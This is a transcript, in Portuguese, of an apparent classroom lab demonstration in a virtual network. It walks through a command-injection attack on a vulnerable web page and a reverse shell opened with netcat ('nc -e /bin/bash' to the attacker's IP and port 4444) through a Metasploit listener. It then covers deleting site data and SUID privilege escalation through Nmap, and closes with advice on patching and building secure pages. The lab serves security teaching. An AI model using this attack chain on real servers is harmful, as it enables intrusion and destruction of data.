Boa noite. A gente vai exemplificar aqui um ataque de injeção de comandos, explorar uma vulnerabilidade que há algum tempo atrás era comum em páginas web, e a gente vai usar o ambiente do Mininet Wi-Fi como ambiente de laboratório, utilizando uma página web vulnerável e um ataque de injeção de comandos. Um dos intuitos, né, da apresentação é reforçar a importância de ter ambientes web seguros e usar, né, as ferramentas mais atualizadas, os pacotes mais atualizados das aplicações, para que não sejam deixadas brechas de segurança. O que a gente vai usar aqui como conceito se assemelha também à injeção de comandos SQL, quando o atacante percebe que uma página web está passando, né, via payload, a execução de um comando específico, seja para ler um arquivo, ou seja para até mesmo, né, um comando SQL ali via PHP está passando de forma muito nítida, muito desprotegida, digamos assim. Então a gente vai começar a mostrar o passo a passo aqui de como a gente explorou essa vulnerabilidade, usando também a ferramenta do Metasploit Framework, que vai ser utilizada pelo atacante. E a página web vai estar usando no Apache 2, numa máquina virtual que a gente chama de Alice, né? E o atacante é a máquina virtual de Chuck. É isso. Tá, então, iniciando uma rápida contextualizada, inicialmente nós vamos identificar a vulnerabilidade, vamos injetar um comando remoto, estabelecer um shell reverso através desse comando remoto, usando o Netcat, e com o acesso ao host do servidor, nós vamos escalonar o privilégio, explorando aplicações que usam SUID. Então, começando, né, como o Gladson falou, nós temos um cenário com um servidor web e um servidor atacante. O nosso servidor web se chama Alice e o nosso servidor atacante se chama Chuck. Eu vou abrir o terminal de Chuck. Tá. Espera que eu estou trazendo meu teclado para cá. Eu vou abrir o terminal de Chuck. Vou abrir o navegador web dele. Firefox. Só para a gente dar uma olhada aqui primeiro na página. A página que nós vamos explorar é essa página relatórios.alice.com.br. Só para pontuar, nesse contexto, em uma intranet, muitas vezes uma rede aberta dá acesso ali a um usuário visitante, até acesso a uma intranet, e isso por si só já é uma falha de segurança. O atacante vê que tem uma página web ali disponível, e ele começa a fuçar essa página web, e ele começa a ver vulnerabilidades. Aí, o Jansen, quando ele clicou aí num botão específico para ver um histórico de vendas, estoque, ele percebeu que no final do URL o final do URL foi alterado, ficou estoque.txt ou vendas.txt. Aí ele passa a presumir que algum comando ali está sendo executado no servidor para fazer a leitura desses arquivos. São arquivos TXT no caso aí, mas poderia ser um outro arquivo, como a gente falou no início, né? Essa injeção de comandos aí, ela pode ser também, usada inclusive, né, no SQL. Então, ele percebeu que está sendo lido um arquivo TXT, então, se está sendo lido um arquivo TXT, algum comando está sendo executado e está sendo repassado via URL. Maravilha, é isso aí. Então, para a gente iniciar o nosso lab, né, nós vamos iniciar o nosso MSF Console. Ele vai dar uma rápida atualizada aqui. Ok. Com o Metasploit iniciado, nós vamos selecionar nosso módulo de ouvinte. Então, use exploit
multi-handler. Com o módulo iniciado, nós vamos definir o tipo de payload que a gente espera, né? Que no caso é um shell de comando simples. Então, set payload. Pode me interromper a qualquer momento, viu? Unix e reverse netcat. Como nós vamos abrir um shell reverso, usando o netcat, nós vamos usar esse payload específico. Tá, o payload definido, nós vamos definir o IP da máquina atacante, para onde o servidor deve se conectar, né? Então, é o nosso próprio IP aqui, que é para onde nós vamos redirecionar todos os comandos. Então, set lhost igual ao nosso IP interno, que é 10.200.0.2. Feito isso, nós vamos definir uma porta que pode ser qualquer porta. O ideal é que a gente defina uma porta acima da 1024 para não dar conflito com as outras, então a gente, aleatoriamente, aqui definimos a 4444, porta, mas poderia ser qualquer outra, e vamos executar. A gente não precisou declarar o host remoto, só declaramos o host local, porque nesse caso o atacante ele já percebeu uma vulnerabilidade de poder executar comandos no host remoto por meio da página web que tem a vulnerabilidade. Então, para esse lab já foi o suficiente declarar o host local, porque o host remoto ele já viu que tem certo acesso ali a executar comandos. Show. Agora a gente precisa que o servidor web se conecte ao nosso atacante na porta 4444, né? Então, como a gente está usando o netcat aqui, a gente vai precisar executar um comando aqui injetar um comando, né, aqui no servidor web, para que ele se conecte ao nosso atacante, né? Então, para isso eu vou usar aqui um encoder, só para encodar o nosso comando. Então, o comando que a gente quer que ele use para se conectar é o nc, netcat-e. Eu vou usar o /bin/bash, que eu estou abrindo um shell reverso. E o nosso IP é o 10.200.02 na porta 4444. Então, a única coisa que eu fiz aqui foi traduzir o nosso comando para que ele seja entendível aí pelo nosso navegador. Então, aqui eu apago. Após o TXT, Após já aqui, dá né? para colocar ponto e vírgula. Isso. Ixi, agora, se eu achar o ponto e vírgula aqui, deixa eu usar o... Perder muito tempo, não. Pronto. Aí ele já executa o segundo comando. Executando esse comando, a gente já vai ver que vai chegar uma conexão aqui. Chegou. E ele abriu uma sessão, né? Ele abriu um shell que veio do nosso servidor web, que é o 10.200.0.1, né? Agora a gente acabou de descobrir o IP também de Alice, né? Feito isso, nós já temos uma sessão aberta com o nosso servidor web, né? O servidor web da vítima, no caso. Então, nós já temos acesso ao host, já podemos explorar, ver o que que tem aqui dentro, em qual pasta que ele está. Então, eu já caí dentro da pasta eu estou no usuário www.data, né, que é o usuário padrão do Apache, e a pasta padrão dele é o var www, então eu já tenho acesso aqui a a toda a pasta, todos os arquivos, né, que pertencem a esse usuário, e com isso eu posso, né, bagunçar Isso todo esse já é usuário. grave, né? Isso já é grave porque, apesar de ele ainda não ter o acesso a root, ele já pode causar um estrago aí na página web. Ele não tem privilégios totais, mas já tem privilégios que não deveria ter. E já dá para bagunçar bastante. Exatamente. A primeira coisa que eu posso fazer aqui é só deletar aqui todo o conteúdo de vendas. Posso fazer o mesmo aqui com estoque. E agora, quando você for, esse aqui provavelmente é cache.
Vou dar um catch aqui. Não foi. Dá um ls-l, porque eu acho que talvez esses arquivos estejam como... Pegou como root, né? Porque quando a É gente isso mesmo. fez a criação no lab, eles estavam É. como root. Então, a gente pode já, então, partir para o escalonamento, então. A gente escalona. Isso. Deixa. A gente agora está como usuário como Apache, né? Então, não conseguimos editar esses arquivos aqui como root. Então, a primeira coisa que a gente faz aqui para escalonar para um usuário privilegiado, né, é procurar uma aplicação que esteja executando como root, né, com permissão de SUID. Então, find barra permanentemente menos u igual a S, que é S de SUID, type F maior. Errei alguma coisa aqui? Ah, não tem. Minha sessão caiu. Isso, a gente vai ter que refazer a sessão. Eu acho que como a gente fechou a página onde tinha um comando de injeção sendo executado, eu acho que ele terminou a Não, sessão. pode ser. Pode ser. Eu vou falar o comando para adiantar aqui, que já está ficando até longo. Show. Aqui nós conseguimos ver uma série de aplicações que executam como root, né? Então, vamos usar o Nmap aqui, é mais acessível. Então, Só Nmap, para vai falar. contextualizar, a gente vê em muitas redes, né, administradores que têm um receio de atualizar os sistemas, porque se eu atualizar pode ser que corrompa, então muitos, e que realmente é um risco, mas acaba que muitos servidores por aí têm pacotes desatualizados, porque esse receio, né, dos administradores em atualizar. Então, a importância de atualizar pacotes para que sejam feitas essas correções é algo muito crucial. O Nmap ele já foi atualizado e ele não tem mais essa vulnerabilidade, mas é comum, sim, encontrar servidores web que ainda rodam versões de algum aplicativo desse, né, que ainda permita esse tipo de ataque. Veja que não é só o Nmap, né, até o VI está incluso nisso aí. Uma série de programas, né, que tem essa falha. É isso aí. Então, agora a gente abre uma sessão interativa com o nosso Nmap, e como ele tem permissão de root, a gente só abre um shell aqui, e agora nós somos root. E com a permissão do superusuário, né, nós podemos ir lá em www, e agora sim a gente vai poder limpar todo o conteúdo de estoque e vendas. Então, se eu vim aqui agora, eu apaguei todo o conteúdo dos dois arquivos que antes só tinham permissão de edição por superusuário, né? Exatamente. Nós buscamos um programa que rodasse como root em qualquer usuário, exploramos essa vulnerabilidade no caso do Nmap, tivemos acesso ao root, e agora a gente pode fazer o que quiser na máquina do servidor web. É isso. Alguma coisa a acrescentar, Jansen? Não, acho que é isso aí mesmo. Acho que a gente fecha, a gente finaliza ali o lado. A gente deixou para falar no final, mas acabamos falando no decorrer da apresentação, né? As formas de se prevenir disso aí é manter os pacotes do sistema atualizados o máximo possível e construir páginas web de forma segura, usando os frameworks as bibliotecas mais modernas. Perfeito. Finalizar aqui, tá? Oi? Finalizar a gravação. Ok.